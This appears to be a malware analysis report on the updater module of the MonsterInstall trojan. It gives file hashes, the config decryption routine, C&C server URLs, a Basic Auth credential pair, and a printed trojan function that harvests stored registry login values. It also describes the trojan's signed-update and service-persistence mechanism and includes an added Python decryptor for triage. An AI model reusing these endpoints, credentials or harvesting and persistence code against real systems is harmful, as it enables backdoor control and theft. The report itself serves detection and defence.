SHA1:
- 4f053ad18150f07f15039bd845d3e2db8bd50c72 (main.js)
- b24e8dfd44a42a74e8c47d759d36fc178d988a93 (start.js)
- 2cfa09b812f90c9f1e0a1e620c4ef9d8f8f6b5e7 (crypto.dll)
- d0a6fab0e4c98413f56f96d68c11ebd64db090cf (network.dll)
- 444d4a915ba55a46b9c551ba4a6c1398a1cd5e16 (windows.dll)
- efe12a67e009c93f0702cc775b78bc70bdac0cd3 (service.exe)
Description
A component of the MonsterInstall trojan that is responsible for updating the backdoor. It consists of several JavaScript scripts and native C++ libraries.
Operating routine
The script is launched using Node.js. It installs itself in the system into the C:\Windows\Reserve Service directory and runs as a service.
Libraries:

| SHA1 | Name | Timestamp | PDB path |
|---|---|---|---|
| 7e6fc66e77fc02b36889043f65d9b654d826b780 | 7z.dll | 09.10.2016 01:26:26 | |
| d0d68b64b39495de80add1a66ecb55cab43a6b25 | 7zip.dll | 16.08.2018 22:02:00 | B:\Develop\VisualStudioProject\module\7zip\Release\7zip.pdb |
| 2cfa09b812f90c9f1e0a1e620c4ef9d8f8f6b5e7 | crypto.dll | 20.08.2018 03:14:44 | B:\Develop\VisualStudioProject\module\crypto\Release\crypto.pdb |
| d0a6fab0e4c98413f56f96d68c11ebd64db090cf | network.dll | 17.08.2018 18:38:49 | B:\Develop\VisualStudioProject\module\network\Release\network.pdb |
| 444d4a915ba55a46b9c551ba4a6c1398a1cd5e16 | windows.dll | 20.08.2018 22:10:36 | B:\Develop\VisualStudioProject\module\windows\Release\windows.pdb |
| efe12a67e009c93f0702cc775b78bc70bdac0cd3 | daemon\service.exe | 22.03.2013 19:31:16 | c:\Users\Corey\Documents\workspace\node-windows\_tmp\winsw\obj\Release\winsw.pdb |
The main module of the trojan is main.js. It sends a request to google.com, yandex.ru or www.i.ua in order to obtain the current date. After that, it decrypts the contents of the file bootList.json with the help of the crypto.dll library.
Decryption algorithm (a byte-wise subtraction of a repeating 3-byte key, reconstructed here in Python):

```python
key = '123'
d = open('bootList.json', 'rb').read().decode('latin-1')  # raw contents of the encrypted file
s = ''
for i in range(len(d)):
    # subtract the key byte for this position and wrap to a single byte
    s += chr((ord(d[i]) - ord(key[i % len(key)])) & 0xff)
```
In the decrypted .json file there’s a list of C&C servers:
[{"node":"http://cortel8x.beget.tech/reserve/","weight":10},{"node":"http://reserve-system.ru/work/","weight":10}]
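An added analyst helper (not code from this report or from the trojan) that reverses the bootList.json scheme above and extracts the C&C URLs. It builds its own sample by re-encrypting the server list quoted on the page with the same key '123'; the function names are mine.

```python
import json

# Key hard-coded in the trojan's decryption routine, as given on the page.
KEY = b"123"


def decrypt_bootlist(data: bytes, key: bytes = KEY) -> bytes:
    """Undo the per-byte key subtraction applied to bootList.json."""
    return bytes((b - key[i % len(key)]) & 0xFF for i, b in enumerate(data))


def encrypt_bootlist(plain: bytes, key: bytes = KEY) -> bytes:
    """Inverse of decrypt_bootlist; used here only to construct a sample."""
    return bytes((b + key[i % len(key)]) & 0xFF for i, b in enumerate(plain))


def extract_nodes(data: bytes) -> list:
    """Decrypt an encrypted bootList.json blob and return its C&C node URLs."""
    boot = json.loads(decrypt_bootlist(data).decode("utf-8"))
    return [entry["node"] for entry in boot]


# Constructed sample: the server list quoted on the page, encrypted with the
# same scheme so the decryptor can be exercised without a live sample.
SAMPLE_PLAIN = json.dumps(
    [
        {"node": "http://cortel8x.beget.tech/reserve/", "weight": 10},
        {"node": "http://reserve-system.ru/work/", "weight": 10},
    ],
    separators=(",", ":"),
).encode("utf-8")
SAMPLE_ENCRYPTED = encrypt_bootlist(SAMPLE_PLAIN)

if __name__ == "__main__":
    for node in extract_nodes(SAMPLE_ENCRYPTED):
        print(node)
```

Point `decrypt_bootlist` at the raw bytes of a recovered bootList.json to list the configured servers during triage.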
The trojan then reads information from the registry:
```javascript
function getInfo()
{
    // "HLM" is the windowsLib shorthand for HKEY_LOCAL_MACHINE (cf. the HKLM path used later);
    // backslashes are escaped so the registry paths survive as JavaScript string literals
    var WindowsNodeInfo = new Object();
    WindowsNodeInfo.mainId = windowsLib.getStringRegKey("HLM\\SOFTWARE\\Microsoft\\Windows Node", "mainId");
    WindowsNodeInfo.login = windowsLib.getStringRegKey("HLM\\SOFTWARE\\Microsoft\\Windows Node", "log");
    WindowsNodeInfo.password = windowsLib.getStringRegKey("HLM\\SOFTWARE\\Microsoft\\Windows Node", "pass");
    WindowsNodeInfo.source = windowsLib.getStringRegKey("HLM\\SOFTWARE\\Microsoft\\Windows Node", "source");
    WindowsNodeInfo.updaterVersion = windowsLib.getStringRegKey("HLM\\SOFTWARE\\Microsoft\\Windows Node", "updaterVersion");
    WindowsNodeInfo.workerVersion = windowsLib.getStringRegKey("HLM\\SOFTWARE\\Microsoft\\Windows Node", "workerVersion");
    var ReserveSystemInfo = new Object();
    // note: the trojan stores the "updaterVersion" value under the workerVersion property
    ReserveSystemInfo.workerVersion = windowsLib.getStringRegKey("HLM\\SOFTWARE\\Microsoft\\Reserve System", "updaterVersion");
    var myInfo = new Object();
    myInfo.windowsNode = WindowsNodeInfo;
    myInfo.reserveSystem = ReserveSystemInfo;
    return JSON.stringify(myInfo);
}
```
After that, the trojan sends this data via a POST request to the C&C server decrypted earlier. An HTTP Basic Authentication header corresponding to the credential pair "cortel:money" is also added to the request.
The server’s response:
{
"data": {
"updaterVersion": [0, 0, 0, 1],
"updaterLink": "/upd.7z",
"updaterVerify": "£ñß(\u0012Ä\ti¾$ë5»\u001c²\u001c\fÙ=±÷ö‚´èUnÐÂBÔ\n\u001dW6?u½\u0005Œn\u000fp:üÍ\u0019\u0000\u000bSý«\u00137®÷\u0013”’ì¥û§s7F\u0016ó\\\u000f%6ñê\"7î<ýo䃃0Æ%tñÅv‚S¡\r\u001e•ÅÆ¡¿N)v\\f8\u0004F\fUS¯‰³§ oIõŒiÆîGݪ\u0017êH/8Ö1-°™[P5E7X‡Fø%SŠXÕ6Oþ=Vô‰…ˆ:.3Œ‚i\u000eÁù9Ã&¾ŒM\u001eÛªé$\u0006#IèÞÛ\u0018À\u001b^è,ÁòÑCTXb\u001d$ç\u0004„ð¶0UVÕ»e\u001f\b\u001e¡Ä¼è+Fjúÿoâz\r!çô3xØs—_\u000b\u0017\u001fY]\u0001¥j^û\\W",
"dateTime": 1534868028000,
"bootList": [{
"node": "http://cortel8x.beget.tech/reserve/",
"weight": 10
}, {
"node": "http://reserve-system.ru/work/",
"weight": 10
}]
},
"dataInfo": "I`ù@ÀP‘ÈcÊÛ´#ièÒ~\u0007<\u0001Ýìûl«ÔÆq\u0013àÛ\u0003\b\u0017ÑLÁ}ÿÚ˜DS®']\u0003bf\u0003!¿Cð¸q¸ÖÜ’B¢CÄAMˆÀA¤d\u001c5¨d-\u0013‰\u0011ѼF‘|SB[¬°(ܹÈÒÜ £L\u00071¾:`\u001bŒìýKõ\"²Ÿ¸$´3™UºÅ¨J†¨cƒf¿}r;Öeì¶x‰ØKt¥‹„47a\u001e¸Ô‡ˆy\u0006•\u001b\u0004‚‹„„•ó\u001a\u0019\nu>¨)bkæ…'\u00127@é‹7µæy3ÈNrS’Mð\u0018\u0019¾òÓ[å5H·¦k‘¿É&PÂÈîåÚ~M\u0010ðnáH擪xÃv cד\u0013
T
ïÑÝ\t\u0018Æ\u00148$”Ôî"
}
The trojan compares the value of the dateTime parameter to the current date. If the difference exceeds one week (counted in milliseconds), the trojan won't execute commands. The dataInfo parameter contains a signature over the "data" field, which is verified using the public key embedded in main.js. The list of servers from the "bootList" parameter is encrypted and stored in the "bootList.json" file.
The trojan compares its own version to the version stated in the "updaterVersion" parameter of the server's response. If the versions match, the trojan runs "upd\upd.exe", passing "main.js" as a parameter. If the version in the server's response is newer, the trojan downloads the upd.7z file from the link in the "updaterLink" parameter, checks its signature and unpacks it. After that, it writes the update's version to the registry value 'updaterVersion' under [HKLM\SOFTWARE\Microsoft\Reserve System] and runs "upd\upd.exe", passing "main.js" as a parameter.
start.js
Launches %win%\Reserve Service\reserve.exe "main.js".
service.exe
A build of the "winsw" utility. It uses the following XML configuration file:
```xml
<service>
    <id>service.exe.exe</id>
    <executable>C:\Windows\Reserve Service\reserve.exe</executable>
    <arguments>"C:\Windows\Reserve Service\start.js" </arguments>
</service>
```